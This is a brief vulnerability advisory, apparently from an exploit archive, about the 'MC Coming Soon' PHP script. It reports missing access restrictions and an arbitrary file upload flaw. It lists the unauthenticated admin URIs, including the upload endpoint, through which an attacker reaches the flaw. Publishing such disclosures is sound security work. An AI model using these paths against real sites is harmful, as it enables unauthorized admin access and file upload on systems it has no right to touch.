Home / os / winmobile

MC Coming Soon Arbitrary File Upload / Improper Access Restrictions

Posted on 17 January 2017

# # # # # # Vulnerability: Improper Access Restrictions # Date: 15.01.2017 # Vendor Homepage: http://microcode.ws/ # Script Name: MC Coming Soon Script # Script Buy Now: http://microcode.ws/product/mc-coming-soon-php-script/3880 # Author: Adeghsan Aencan # Author Web: http://ihsan.net # Mail : ihsan[beygir]ihsan[nokta]net # # # # # # Direct entrance.. # An attacker can exploit this issue via a browser. # The following example URIs are available: # # http://localhost/[PATH]/admin/slider.php # file.php upload # http://localhost/[PATH]/admin/imageslider/file.php # # http://localhost/[PATH]/admin/launch_time.php # http://localhost/[PATH]/admin/launch_message.php # http://localhost/[PATH]/admin/send_message.php # http://localhost/[PATH]/admin/subscribers.php # http://localhost/[PATH]/admin/settings.php # http://localhost/[PATH]/admin/users.php # Vs....... # # # # #

 

TOP